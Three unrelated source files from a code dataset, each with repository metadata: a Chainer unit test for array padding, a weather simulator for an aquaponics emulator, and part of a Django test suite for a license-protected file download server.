2017-06-01T07:36:12.000Z
|
2022-03-30T10:46:15.000Z
|
tests/chainer_tests/functions_tests/array_tests/test_pad.py
|
hitsgub/chainer
|
20d4d70f5cdacc1f24f243443f5bebc2055c8f8e
|
[
"MIT"
] | 5,998
|
2017-06-01T06:40:17.000Z
|
2022-03-08T01:42:44.000Z
|
tests/chainer_tests/functions_tests/array_tests/test_pad.py
|
hitsgub/chainer
|
20d4d70f5cdacc1f24f243443f5bebc2055c8f8e
|
[
"MIT"
] | 1,150
|
2017-06-02T03:39:46.000Z
|
2022-03-29T02:29:32.000Z
|
import numpy
from chainer import functions
from chainer import testing
@testing.parameterize(*testing.product_dict(
[
{'shape': (), 'pad_width': 1, 'mode': 'constant'},
{'shape': (2, 3), 'pad_width': 0, 'mode': 'constant'},
{'shape': (2, 3), 'pad_width': 1, 'mode': 'constant'},
{'shape': (2, 3), 'pad_width': (1, 2), 'mode': 'constant'},
{'shape': (2, 3), 'pad_width': ((1, 2), (3, 4)), 'mode': 'constant'},
{'shape': (2, 3, 2), 'pad_width': ((2, 5), (1, 2), (0, 7)),
'mode': 'constant'},
{'shape': (1, 3, 5, 2), 'pad_width': 2, 'mode': 'constant'}
],
[
{'dtype': numpy.float16},
{'dtype': numpy.float32},
{'dtype': numpy.float64}
]
))
@testing.inject_backend_tests(
None,
# CPU tests
[
{},
]
# GPU tests
+ testing.product({
'use_cuda': [True],
'use_cudnn': ['never', 'always'],
'cuda_device': [0, 1],
})
# ChainerX tests
+ testing.product({
'use_chainerx': [True],
'chainerx_device': ['native:0', 'cuda:0', 'cuda:1'],
})
)
class TestPadDefault(testing.FunctionTestCase):
def setUp(self):
self.check_backward_options = {}
if self.dtype == numpy.float16:
self.check_backward_options.update({'atol': 3e-2, 'rtol': 3e-2})
def generate_inputs(self):
x = numpy.random.uniform(-1, 1, self.shape).astype(self.dtype)
return x,
def forward(self, inputs, device):
x, = inputs
y = functions.pad(x, self.pad_width, self.mode)
return y,
def forward_expected(self, inputs):
x, = inputs
y_expected = numpy.pad(x, self.pad_width, self.mode)
return y_expected.astype(self.dtype),
@testing.parameterize(*testing.product_dict(
[
{'shape': (2, 3), 'pad_width': 1, 'mode': 'constant',
'constant_values': 1},
{'shape': (2, 3), 'pad_width': (1, 2), 'mode': 'constant',
'constant_values': (1, 2)},
{'shape': (2, 3), 'pad_width': ((1, 2), (3, 4)), 'mode': 'constant',
'constant_values': ((1, 2), (3, 4))},
],
[
{'dtype': numpy.float16},
{'dtype': numpy.float32},
{'dtype': numpy.float64}
]
))
@testing.inject_backend_tests(
None,
# CPU tests
[
{},
]
# GPU tests
+ testing.product({
'use_cuda': [True],
'use_cudnn': ['never', 'always'],
'cuda_device': [0, 1],
})
# ChainerX tests
+ testing.product({
'use_chainerx': [True],
'chainerx_device': ['native:0', 'cuda:0', 'cuda:1'],
})
)
# Old numpy does not work with multi-dimensional constant_values
@testing.with_requires('numpy>=1.11.1')
class TestPad(testing.FunctionTestCase):
def setUp(self):
self.check_backward_options = {}
if self.dtype == numpy.float16:
self.check_backward_options.update({'atol': 3e-2, 'rtol': 3e-2})
def generate_inputs(self):
x = numpy.random.uniform(-1, 1, self.shape).astype(self.dtype)
return x,
def forward_expected(self, inputs):
x, = inputs
y_expected = numpy.pad(x, self.pad_width, mode=self.mode,
constant_values=self.constant_values)
return y_expected,
def forward(self, inputs, device):
x, = inputs
y = functions.pad(x, self.pad_width, mode=self.mode,
constant_values=self.constant_values)
return y,
testing.run_module(__name__, __file__)
| 28.709677
| 77
| 0.544101
| 420
| 3,560
| 4.459524
| 0.188095
| 0.059797
| 0.029899
| 0.037373
| 0.846236
| 0.83449
| 0.775227
| 0.775227
| 0.750133
| 0.711159
| 0
| 0.035977
| 0.273876
| 3,560
| 123
| 78
| 28.943089
| 0.688588
| 0.037079
| 0
| 0.613861
| 0
| 0
| 0.156725
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079208
| false
| 0
| 0.029703
| 0
| 0.188119
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c8274a05db301310a054e1016e89d20f0a6160d1
| 17,365
|
py
|
Python
|
src/AquaponicsSystem/EmulatedHardware/Simulators/ExternalEnvironment/Weather.py
|
Prakhar623/Aquaphonics
|
28b095b80edf3fe294bb6438d15f3bcc2d3e5c47
|
[
"MIT"
] | 1
|
2021-06-30T18:11:55.000Z
|
2021-06-30T18:11:55.000Z
|
src/AquaponicsSystem/EmulatedHardware/Simulators/ExternalEnvironment/Weather.py
|
Prakhar623/Aquaphonics
|
28b095b80edf3fe294bb6438d15f3bcc2d3e5c47
|
[
"MIT"
] | null | null | null |
src/AquaponicsSystem/EmulatedHardware/Simulators/ExternalEnvironment/Weather.py
|
Prakhar623/Aquaphonics
|
28b095b80edf3fe294bb6438d15f3bcc2d3e5c47
|
[
"MIT"
] | 2
|
2021-07-15T13:53:14.000Z
|
2022-02-28T11:44:54.000Z
|
import random
from ...ProjectEssentials import (AutoExecutor, Signal,)
class Weather:
def __init__ (self, externalweathersensor, timespeed=None):
if (type(externalweathersensor).__name__ != 'ExternalWeather'):
raise TypeError("externalweathersensor requires 'ExternalWeather'")
if (type(timespeed).__name__ == 'NoneType'\
or type(timespeed).__name__ == 'int'\
or type(timespeed).__name__ == 'float'):
if (timespeed == None):
timespeed = 1.0
if (timespeed <= 0.0 or timespeed >= 60000.0):
raise ValueError("invalid timespeed '{0}'".format(timespeed))
else:
raise TypeError("timespeed requires 'None' or 'int' or 'float'")
self._dataAttributes = {
"sensor" : externalweathersensor,
# event : [eventexecutor, *signalIDs]
"raining" : [
AutoExecutor.AutoExecutor(
exec_function=self.change_raining,
runType='thread',
times=None,
interval=1800.0,
timespeed=timespeed,
# autopause=True,
daemon=True,
),
],
"sunlight" : [
AutoExecutor.AutoExecutor(
exec_function=self.change_sunlight,
runType='thread',
times=None,
interval=900.0,
timespeed=timespeed,
# autopause=True,
daemon=True,
),
],
"temperature" : [
AutoExecutor.AutoExecutor(
exec_function=self.change_temperature,
runType='thread',
times=None,
interval=360.0,
timespeed=timespeed,
# autopause=True,
daemon=True,
),
],
"humidity" : [
AutoExecutor.AutoExecutor(
exec_function=self.change_humidity,
runType='thread',
times=None,
interval=480.0,
timespeed=timespeed,
# autopause=True,
daemon=True,
),
],
}
"""
"randomChanger" : [
AutoExecutor.AutoExecutor(
exec_function=self._randomChanger,
runType='thread',
times=None,
interval=600.0,
timespeed=timespeed,
autopause=False,
daemon=True,
),
],
}
(self._dataAttributes['raining']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'raining',
[
self._dataAttributes['raining'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['raining']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'sunlight',
[
self._dataAttributes['raining'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['sunlight']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'raining',
[
self._dataAttributes['sunlight'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['sunlight']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'sunlight',
[
self._dataAttributes['sunlight'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['temperature']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'raining',
[
self._dataAttributes['temperature'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['temperature']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'sunlight',
[
self._dataAttributes['temperature'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['temperature']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'temperature',
[
self._dataAttributes['temperature'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['humidity']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'raining',
[
self._dataAttributes['humidity'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['humidity']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'sunlight',
[
self._dataAttributes['humidity'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['humidity']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'temperature',
[
self._dataAttributes['humidity'][0].resume,
None,
None,
],
autodelete=True,
)
)
(self._dataAttributes['humidity']).append(
Signal.Signal.add(
self._dataAttributes['sensor'].serial,
'humidity',
[
self._dataAttributes['humidity'][0].resume,
None,
None,
],
autodelete=True,
)
)
"""
def start (self):
if (self._dataAttributes['raining'][0].is_alive()):
self._dataAttributes['raining'][0].start()
if (self._dataAttributes['sunlight'][0].is_alive()):
self._dataAttributes['sunlight'][0].start()
if (self._dataAttributes['temperature'][0].is_alive()):
self._dataAttributes['temperature'][0].start()
if (self._dataAttributes['humidity'][0].is_alive()):
self._dataAttributes['humidity'][0].start()
# if (self._dataAttributes['randomChanger'][0].is_alive()):
# self._dataAttributes['randomChanger'][0].start()
def stop (self):
if (self._dataAttributes['raining'][0].is_alive()):
self._dataAttributes['raining'][0].kill()
if (self._dataAttributes['sunlight'][0].is_alive()):
self._dataAttributes['sunlight'][0].kill()
if (self._dataAttributes['temperature'][0].is_alive()):
self._dataAttributes['temperature'][0].kill()
if (self._dataAttributes['humidity'][0].is_alive()):
self._dataAttributes['humidity'][0].kill()
# if (self._dataAttributes['randomChanger'][0].is_alive()):
# self._dataAttributes['randomChanger'][0].kill()
"""
def _randomChanger (self):
key = random.choice(['raining', 'sunlight', 'temperature', 'humidity',])
if (self._dataAttributes[key][0].is_alive()\
and self._dataAttributes[key][0].is_paused()):
self._dataAttributes[key][0].resume()
"""
def change_raining (self):
if (self._dataAttributes['sensor'].read('sunlight')\
and self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='raining',
value=random.choice(
[
False, False, False, False, False, False,
True, True, True, True,
# 40% rain, 60% no rain.
],
),
)
elif (not self._dataAttributes['sensor'].read('sunlight')\
and self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='raining',
value=random.choice(
[
False, False, False,
True, True, True, True, True, True, True,
# 70% rain, 30% no rain.
],
),
)
elif (self._dataAttributes['sensor'].read('sunlight')\
and not self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='raining',
value=random.choice(
[
False, False, False, False, False, False, False, False,
True, True,
# 20% rain, 80% no rain.
],
),
)
elif (not self._dataAttributes['sensor'].read('sunlight')\
and not self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='raining',
value=random.choice(
[
False, False, False, False, False,
True, True, True, True, True,
# 50% rain, 50% no rain.
],
),
)
def change_sunlight (self):
if (self._dataAttributes['sensor'].read('sunlight')\
and self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='sunlight',
value=random.choice(
[
False, False, False, False,
True, True, True, True, True, True,
# 60% sunlight, 40% no sunlight.
],
),
)
elif (not self._dataAttributes['sensor'].read('sunlight')\
and self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='sunlight',
value=random.choice(
[
False, False, False, False, False, False, False, False,
True, True,
# 20% sunlight, 80% no sunlight.
],
),
)
elif (self._dataAttributes['sensor'].read('sunlight')\
and not self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='sunlight',
value=random.choice(
[
False, False,
True, True, True, True, True, True, True, True,
# 80% sunlight, 20% no sunlight.
],
),
)
elif (not self._dataAttributes['sensor'].read('sunlight')\
and not self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='sunlight',
value=random.choice(
[
False, False, False, False, False,
True, True, True, True, True,
# 50% sunlight, 50% no sunlight.
],
),
)
def change_temperature (self):
if (self._dataAttributes['sensor'].read('sunlight')\
and self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='temperature',
value=round(
random.uniform(
self._dataAttributes['sensor'].read('temperature')\
- (self._temperatureAdjustment() * 3.0),
self._dataAttributes['sensor'].read('temperature')\
+ (self._temperatureAdjustment(True) * 3.0),
),
2,
),
)
elif (not self._dataAttributes['sensor'].read('sunlight')\
and self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='temperature',
value=round(
random.uniform(
self._dataAttributes['sensor'].read('temperature')\
- (self._temperatureAdjustment() * 3.0),
self._dataAttributes['sensor'].read('temperature')\
+ (self._temperatureAdjustment() * 2.0),
),
2,
),
)
elif (self._dataAttributes['sensor'].read('sunlight')\
and not self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='temperature',
value=round(
random.uniform(
self._dataAttributes['sensor'].read('temperature')\
- (self._temperatureAdjustment(True) * 2.0),
self._dataAttributes['sensor'].read('temperature')\
+ (self._temperatureAdjustment(True) * 3.0),
),
2,
),
)
elif (not self._dataAttributes['sensor'].read('sunlight')\
and not self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='temperature',
value=round(
random.uniform(
self._dataAttributes['sensor'].read('temperature')\
- (self._temperatureAdjustment() * 2.0),
self._dataAttributes['sensor'].read('temperature')\
+ (self._temperatureAdjustment(True) * 1.0),
),
2,
),
)
def change_humidity (self):
if (self._dataAttributes['sensor'].read('sunlight')\
and self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='humidity',
value=round(
random.uniform(
50.0 - (self._humidityAdjustment(False, True) * 25.0),
50.0 + (self._humidityAdjustment(False, False) * 15.0),
),
2,
),
)
elif (not self._dataAttributes['sensor'].read('sunlight')\
and self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='humidity',
value=round(
random.uniform(
60.0 - (self._humidityAdjustment(True, False) * 5.0),
80.0 + (self._humidityAdjustment(True, False) * 15.0),
),
2,
),
)
elif (self._dataAttributes['sensor'].read('sunlight')\
and not self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='humidity',
value=round(
random.uniform(
10.0 - (self._humidityAdjustment(False, True) * 5.0),
20.0 + (self._humidityAdjustment(True, False) * 10.0),
),
2,
),
)
elif (not self._dataAttributes['sensor'].read('sunlight')\
and not self._dataAttributes['sensor'].read('raining')):
self._dataAttributes['sensor'].write(
key='humidity',
value=round(
random.uniform(
50.0 - (self._humidityAdjustment(True, False) * 25.0),
50.0 + (self._humidityAdjustment(False, True) * 25.0),
),
2,
),
)
def _normalize (self, x, low, high):
return ((x - low)/(high - low))
def _sigmoid (self, x):
return (1/(1 + (2.71828182846) ** (-x)))
def _temperatureAdjustment (self, invert=False):
if (type(invert).__name__ != 'bool'):
raise TypeError("invert requires 'bool'")
temperature = self._dataAttributes['sensor'].read('temperature')
if (temperature >= 40.0 and temperature <= 50.0):
result = self._normalize(temperature, 45.0, 50.0)
elif (temperature >= 30.0 and temperature < 40.0):
result = self._normalize(temperature, 35.0, 40.0)
elif (temperature >= 20.0 and temperature < 30.0):
result = self._normalize(temperature, 25.0, 30.0)
elif (temperature >= 0.0 and temperature < 20.0):
result = self._normalize(temperature, 10.0, 20.0)
elif (temperature >= -20.0 and temperature < 0.0):
result = self._normalize(temperature, -10.0, 0.0)
result *= 7.0
return (self._sigmoid(-result if (invert) else result))
def _humidityAdjustment (self, invert=True, highRate=True):
if (type(invert).__name__ != 'bool'):
raise TypeError("invert requires 'bool'")
if (type(highRate).__name__ != 'bool'):
raise TypeError("highRate requires 'bool'")
temperature = self._dataAttributes['sensor'].read('temperature')
humidity = self._dataAttributes['sensor'].read('humidity')
result = self._normalize(temperature, 20.0, 50.0) * 7.0
result = (self._sigmoid(-result if (invert) else result))
result = self._normalize((result * humidity), 50.0, 100.0) * 7.0
return (self._sigmoid(result if (highRate) else -result))
| 34.591633
| 78
| 0.494328
| 1,421
| 17,365
| 5.896552
| 0.078114
| 0.249194
| 0.203366
| 0.143693
| 0.822771
| 0.761547
| 0.739587
| 0.686597
| 0.666905
| 0.648765
| 0
| 0.023605
| 0.370573
| 17,365
| 501
| 79
| 34.660679
| 0.743001
| 0.030406
| 0
| 0.627063
| 0
| 0
| 0.101845
| 0.001677
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036304
| false
| 0
| 0.006601
| 0.006601
| 0.059406
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c84d652bdad990acb2270426925799537bca7561
| 50,859
|
py
|
Python
|
license_protected_downloads/tests/test_views.py
|
NexellCorp/infrastructure_server_fileserver
|
b2d0cd30b7658735f914c29e401a670d9bb42f92
|
[
"Net-SNMP",
"Xnet",
"Info-ZIP",
"OML"
] | null | null | null |
license_protected_downloads/tests/test_views.py
|
NexellCorp/infrastructure_server_fileserver
|
b2d0cd30b7658735f914c29e401a670d9bb42f92
|
[
"Net-SNMP",
"Xnet",
"Info-ZIP",
"OML"
] | null | null | null |
license_protected_downloads/tests/test_views.py
|
NexellCorp/infrastructure_server_fileserver
|
b2d0cd30b7658735f914c29e401a670d9bb42f92
|
[
"Net-SNMP",
"Xnet",
"Info-ZIP",
"OML"
] | null | null | null |
__author__ = 'dooferlad'
import hashlib
import os
import tempfile
import unittest
import urllib2
import urlparse
import json
import random
import shutil
import mock
from django.conf import settings
from django.test import Client, TestCase
from django.http import HttpResponse
from license_protected_downloads.buildinfo import BuildInfo
from license_protected_downloads.config import INTERNAL_HOSTS
from license_protected_downloads.models import APIKeyStore
from license_protected_downloads.tests.helpers import temporary_directory
from license_protected_downloads.tests.helpers import TestHttpServer
from license_protected_downloads.views import _insert_license_into_db
from license_protected_downloads.views import _process_include_tags
from license_protected_downloads.views import _sizeof_fmt
from license_protected_downloads.views import is_same_parent_dir
from license_protected_downloads import views
THIS_DIRECTORY = os.path.dirname(os.path.abspath(__file__))
TESTSERVER_ROOT = os.path.join(THIS_DIRECTORY, "testserver_root")
class BaseServeViewTest(TestCase):
def setUp(self):
self.client = Client()
self.old_served_paths = settings.SERVED_PATHS
settings.SERVED_PATHS = [os.path.join(THIS_DIRECTORY,
"testserver_root")]
self.old_upload_path = settings.UPLOAD_PATH
settings.UPLOAD_PATH = os.path.join(THIS_DIRECTORY,
"test_upload_root")
if not os.path.isdir(settings.UPLOAD_PATH):
os.makedirs(settings.UPLOAD_PATH)
self.old_master_api_key = settings.MASTER_API_KEY
settings.MASTER_API_KEY = "1234abcd"
def tearDown(self):
settings.SERVED_PATHS = self.old_served_paths
settings.MASTER_API_KEY = self.old_master_api_key
os.rmdir(settings.UPLOAD_PATH)
settings.UPLOAD_PATH = self.old_upload_path
class ViewTests(BaseServeViewTest):
def test_license_directly(self):
response = self.client.get('/licenses/license.html', follow=True)
self.assertEqual(response.status_code, 200)
self.assertContains(response, '/build-info')
def test_licensefile_directly_samsung(self):
response = self.client.get('/licenses/samsung.html', follow=True)
self.assertEqual(response.status_code, 200)
self.assertContains(response, '/build-info')
def test_licensefile_directly_ste(self):
response = self.client.get('/licenses/ste.html', follow=True)
self.assertEqual(response.status_code, 200)
self.assertContains(response, '/build-info')
def test_licensefile_directly_linaro(self):
response = self.client.get('/licenses/linaro.html', follow=True)
self.assertEqual(response.status_code, 200)
self.assertContains(response, '/build-info')
def test_redirect_to_license_samsung(self):
# Get BuildInfo for target file
target_file = "build-info/origen-blob.txt"
file_path = os.path.join(TESTSERVER_ROOT, target_file)
build_info = BuildInfo(file_path)
# Try to fetch file from server - we should be redirected
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
digest = hashlib.md5(build_info.get("license-text")).hexdigest()
self.assertRedirects(response, '/license?lic=%s&url=%s' %
(digest, target_file))
# Make sure that we get the license text in the license page
self.assertContains(response, build_info.get("license-text"))
# Test that we use the "samsung" theme. This contains exynos.png
self.assertContains(response, "exynos.png")
def test_redirect_to_license_ste(self):
# Get BuildInfo for target file
target_file = "build-info/snowball-blob.txt"
file_path = os.path.join(TESTSERVER_ROOT, target_file)
build_info = BuildInfo(file_path)
# Try to fetch file from server - we should be redirected
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
digest = hashlib.md5(build_info.get("license-text")).hexdigest()
self.assertRedirects(response, '/license?lic=%s&url=%s' %
(digest, target_file))
# Make sure that we get the license text in the license page
self.assertContains(response, build_info.get("license-text"))
# Test that we use the "stericsson" theme. This contains igloo.png
self.assertContains(response, "igloo.png")
def test_redirect_to_license_linaro(self):
# Get BuildInfo for target file
target_file = "build-info/linaro-blob.txt"
file_path = os.path.join(TESTSERVER_ROOT, target_file)
build_info = BuildInfo(file_path)
# Try to fetch file from server - we should be redirected
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
digest = hashlib.md5(build_info.get("license-text")).hexdigest()
self.assertRedirects(response, '/license?lic=%s&url=%s' %
(digest, target_file))
# Make sure that we get the license text in the license page
self.assertContains(response, build_info.get("license-text"))
# Test that we use the "linaro" theme. This contains linaro.png
self.assertContains(response, "linaro.png")
def set_up_license(self, target_file, index=0):
# Get BuildInfo for target file
file_path = os.path.join(TESTSERVER_ROOT, target_file)
build_info = BuildInfo(file_path)
# Insert license information into database
text = build_info.get("license-text", index)
digest = hashlib.md5(text).hexdigest()
theme = build_info.get("theme", index)
_insert_license_into_db(digest, text, theme)
return digest
def test_redirect_to_file_on_accept_license(self):
target_file = "build-info/linaro-blob.txt"
digest = self.set_up_license(target_file)
# Accept the license for our file...
accept_url = '/accept-license?lic=%s&url=%s' % (digest, target_file)
response = self.client.post(accept_url, {"accept": "accept"})
# We should have a license accept cookie.
accept_cookie_name = "license_accepted_" + digest
self.assertTrue(accept_cookie_name in response.cookies)
# We should get redirected back to the original file location.
self.assertEqual(response.status_code, 302)
url = urlparse.urljoin("http://testserver/", target_file)
listing_url = os.path.dirname(url)
self.assertEqual(response['Location'],
listing_url + "?dl=/" + target_file)
def test_redirect_to_decline_page_on_decline_license(self):
target_file = "build-info/linaro-blob.txt"
digest = self.set_up_license(target_file)
# Reject the license for our file...
accept_url = '/accept-license?lic=%s&url=%s' % (digest, target_file)
response = self.client.post(accept_url, {"reject": "reject"})
# We should get a message saying we don't have access to the file.
self.assertContains(response, "Without accepting the license, you can"
" not download the requested files.")
def test_download_file_accepted_license(self):
target_file = "build-info/linaro-blob.txt"
url = urlparse.urljoin("http://testserver/", target_file)
digest = self.set_up_license(target_file)
# Accept the license for our file...
accept_url = '/accept-license?lic=%s&url=%s' % (digest, target_file)
response = self.client.post(accept_url, {"accept": "accept"})
# We should get redirected back to the original file location.
self.assertEqual(response.status_code, 302)
listing_url = os.path.dirname(url)
self.assertEqual(response['Location'],
listing_url + "?dl=/" + target_file)
# We should have a license accept cookie.
accept_cookie_name = "license_accepted_" + digest
self.assertTrue(accept_cookie_name in response.cookies)
# XXX Workaround for seemingly out of sync cookie handling XXX
# The cookies in client.cookies are instances of
# http://docs.python.org/library/cookie.html once they have been
# returned by a client get/post. Unfortunately for the next query
# client.cookies needs to be a dictionary keyed by cookie name and
# containing a value of whatever is stored in the cookie (or so it
# seems). For this reason we start up a new client, erasing all
# cookies from the current session, and re-introduce them.
client = Client()
client.cookies[accept_cookie_name] = accept_cookie_name
response = client.get(url)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_api_get_license_list(self):
target_file = "build-info/snowball-blob.txt"
digest = self.set_up_license(target_file)
license_url = "/api/license/" + target_file
# Download JSON containing license information
response = self.client.get(license_url)
data = json.loads(response.content)["licenses"]
# Extract digests
digests = [d["digest"] for d in data]
# Make sure digests match what is in the database
self.assertIn(digest, digests)
self.assertEqual(len(digests), 1)
def test_api_get_license_list_multi_license(self):
target_file = "build-info/multi-license.txt"
digest_1 = self.set_up_license(target_file)
digest_2 = self.set_up_license(target_file, 1)
license_url = "/api/license/" + target_file
# Download JSON containing license information
response = self.client.get(license_url)
data = json.loads(response.content)["licenses"]
# Extract digests
digests = [d["digest"] for d in data]
# Make sure digests match what is in the database
self.assertIn(digest_1, digests)
self.assertIn(digest_2, digests)
self.assertEqual(len(digests), 2)
def test_api_get_license_list_404(self):
target_file = "build-info/snowball-b"
license_url = "/api/license/" + target_file
# Download JSON containing license information
response = self.client.get(license_url)
self.assertEqual(response.status_code, 404)
def test_api_download_file(self):
target_file = "build-info/snowball-blob.txt"
digest = self.set_up_license(target_file)
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True,
HTTP_LICENSE_ACCEPTED=digest)
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_api_download_file_multi_license(self):
target_file = "build-info/multi-license.txt"
digest_1 = self.set_up_license(target_file)
digest_2 = self.set_up_license(target_file, 1)
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(
url, follow=True,
HTTP_LICENSE_ACCEPTED=" ".join([digest_1, digest_2]))
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_api_download_file_404(self):
target_file = "build-info/snowball-blob.txt"
digest = self.set_up_license(target_file)
url = urlparse.urljoin("http://testserver/", target_file[:-2])
response = self.client.get(url, follow=True,
HTTP_LICENSE_ACCEPTED=digest)
self.assertEqual(response.status_code, 404)
def test_api_get_listing(self):
url = "/api/ls/build-info"
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)["files"]
# For each file listed, check some key attributes
for file_info in data:
file_path = os.path.join(TESTSERVER_ROOT,
file_info["url"].lstrip("/"))
if file_info["type"] == "folder":
self.assertTrue(os.path.isdir(file_path))
else:
self.assertTrue(os.path.isfile(file_path))
mtime = os.path.getmtime(file_path)
self.assertEqual(mtime, file_info["mtime"])
def test_api_get_listing_single_file(self):
url = "/api/ls/build-info/snowball-blob.txt"
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)["files"]
# Should be a listing for a single file
self.assertEqual(len(data), 1)
# For each file listed, check some key attributes
for file_info in data:
file_path = os.path.join(TESTSERVER_ROOT,
file_info["url"].lstrip("/"))
if file_info["type"] == "folder":
self.assertTrue(os.path.isdir(file_path))
else:
self.assertTrue(os.path.isfile(file_path))
mtime = os.path.getmtime(file_path)
self.assertEqual(mtime, file_info["mtime"])
def test_api_get_listing_404(self):
url = "/api/ls/buld-info"
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_OPEN_EULA_txt(self):
target_file = '~linaro-android/staging-vexpress-a9/test.txt'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
file_path = os.path.join(TESTSERVER_ROOT, target_file)
self.assertEqual(response['X-Sendfile'], file_path)
def test_never_available_dirs(self):
target_file = '~linaro-android/staging-imx53/test.txt'
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If we don't have access we will get a Forbidden response (403)
self.assertEqual(response.status_code, 403)
def test_protected_by_EULA_txt(self):
# Get BuildInfo for target file
target_file = "~linaro-android/staging-origen/test.txt"
# Try to fetch file from server - we should be redirected
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
eula_path = os.path.join(settings.PROJECT_ROOT,
"templates/licenses/samsung.txt")
with open(eula_path) as license_file:
license_text = license_file.read()
digest = hashlib.md5(license_text).hexdigest()
self.assertRedirects(response, "/license?lic=%s&url=%s" %
(digest, target_file))
# Make sure that we get the license text in the license page
self.assertContains(response, license_text)
# Test that we use the "samsung" theme. This contains exynos.png
self.assertContains(response, "exynos.png")
@mock.patch('license_protected_downloads.views.config')
def test_protected_internal_file(self, config):
'''ensure a protected file can be downloaded by an internal host'''
config.INTERNAL_HOSTS = ('127.0.0.1',)
target_file = "~linaro-android/staging-origen/test.txt"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertIn('X-Sendfile', response)
@mock.patch('license_protected_downloads.views.config')
def test_protected_internal_listing(self, config):
'''ensure directory listings are browseable for internal hosts'''
config.INTERNAL_HOSTS = ('127.0.0.1',)
response = self.client.get('http://testserver/')
self.assertIn('linaro-license-protection.git/commit', response.content)
def test_per_file_license_samsung(self):
# Get BuildInfo for target file
target_file = "images/origen-blob.txt"
# Try to fetch file from server - we should be redirected
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
eula_path = os.path.join(settings.PROJECT_ROOT,
"templates/licenses/samsung.txt")
with open(eula_path) as license_file:
license_text = license_file.read()
digest = hashlib.md5(license_text).hexdigest()
self.assertRedirects(response, "/license?lic=%s&url=%s" %
(digest, target_file))
# Make sure that we get the license text in the license page
self.assertContains(response, license_text)
# Test that we use the "samsung" theme. This contains exynos.png
self.assertContains(response, "exynos.png")
def test_per_file_non_protected_dirs(self):
target_file = "images/MANIFEST"
url = urlparse.urljoin("http://testserver/", target_file)
response = self.client.get(url, follow=True)
# If we have access to the file, we will get an X-Sendfile response
self.assertEqual(response.status_code, 200)
